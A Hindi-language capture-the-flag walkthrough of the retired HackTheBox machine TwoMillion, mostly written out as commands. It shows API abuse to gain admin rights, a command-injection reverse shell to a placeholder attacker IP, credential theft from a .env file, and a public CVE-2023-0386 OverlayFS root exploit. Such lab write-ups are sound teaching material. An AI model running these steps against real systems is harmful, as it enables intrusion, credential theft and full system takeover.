
HackTheBox TwoMillion मशीन राइटअप — API दुरुपयोग, कमांड इंजेक्शन और CVE-2023-0386
HackTheBox TwoMillion मशीन राइटअप — API दुरुपयोग, कमांड इंजेक्शन और CVE-2023-0386
| फ़ील्ड | विवरण |
|---|---|
| नाम | TwoMillion |
| कठिनाई | आसान |
| OS | Linux |
| IP | 10.10.11.221 |
| CVE | CVE-2023-0386 |
TwoMillion एक आसान Linux मशीन है जो पुराने HackTheBox प्लेटफ़ॉर्म पर आधारित है। इसमें एक आमंत्रण कोड डीकोड करना, API एंडपॉइंट का दुरुपयोग, OS कमांड इंजेक्शन, क्रेडेंशियल खोज, और CVE-2023-0386 (OverlayFS) के माध्यम से Linux कर्नेल विशेषाधिकार वृद्धि शामिल है।
nmap -sV -sC -v 10.10.11.221
खुले पोर्ट:
2million.htb पर रीडायरेक्ट/etc/hosts में जोड़ें:
echo "10.10.11.221 2million.htb" >> /etc/hosts
curl -X POST http://2million.htb/api/v1/invite/how/to/generate
प्रतिक्रिया ROT13 एन्कोडेड है। इसे डीकोड करें:
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'
आमंत्रण कोड जनरेट करें:
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d
http://2million.htb/register पर डीकोड किए गए आमंत्रण कोड का उपयोग करके रजिस्टर करें।
ब्राउज़र से लॉगिन करें, कुकीज़ से PHPSESSID प्राप्त करें (F12 → Application → Cookies)।
एडमिन में अपग्रेड करें:
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"email":"[email protected]","is_admin":1}'
सत्यापित करें:
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}
लिसनर शुरू करें:
nc -lvnp 4444
रिवर्स शेल पेलोड भेजें:
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'
www-data के रूप में शेल प्राप्त हुआ।
.env में क्रेडेंशियल खोजें:
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123
SSH से लॉगिन करें:
ssh [email protected]
cat ~/user.txt
संकेत देखें:
cat /var/mail/admin
uname -r
# 5.15.70 — CVE-2023-0386 के लिए कमजोर
Kali पर एक्सप्लॉइट डाउनलोड और कंपाइल करें:
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all
लक्ष्य पर स्थानांतरित करें:
# Kali
python3 -m http.server 8000
# Target
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all
लक्ष्य पर दो टर्मिनलों में चलाएँ:
टर्मिनल 1:
./fuse ./ovlcap/lower ./gc
टर्मिनल 2:
./exp
रूट फ़्लैग प्राप्त करें:
cat /root/root.txt
यह राइटअप केवल सेवानिवृत्त HackTheBox मशीन पर शैक्षिक उद्देश्यों के लिए है।
| चरण | तकनीक |
|---|
| खोज | Nmap स्कैन |
| आमंत्रण कोड | ROT13 + Base64 डीकोड |
| वेब विशेषाधिकार वृद्धि | API हेरफेर → एडमिन |
| प्रारंभिक शेल | OS कमांड इंजेक्शन |
| पार्श्व गति | .env क्रेडेंशियल्स → SSH |
| रूट | CVE-2023-0386 OverlayFS शोषण |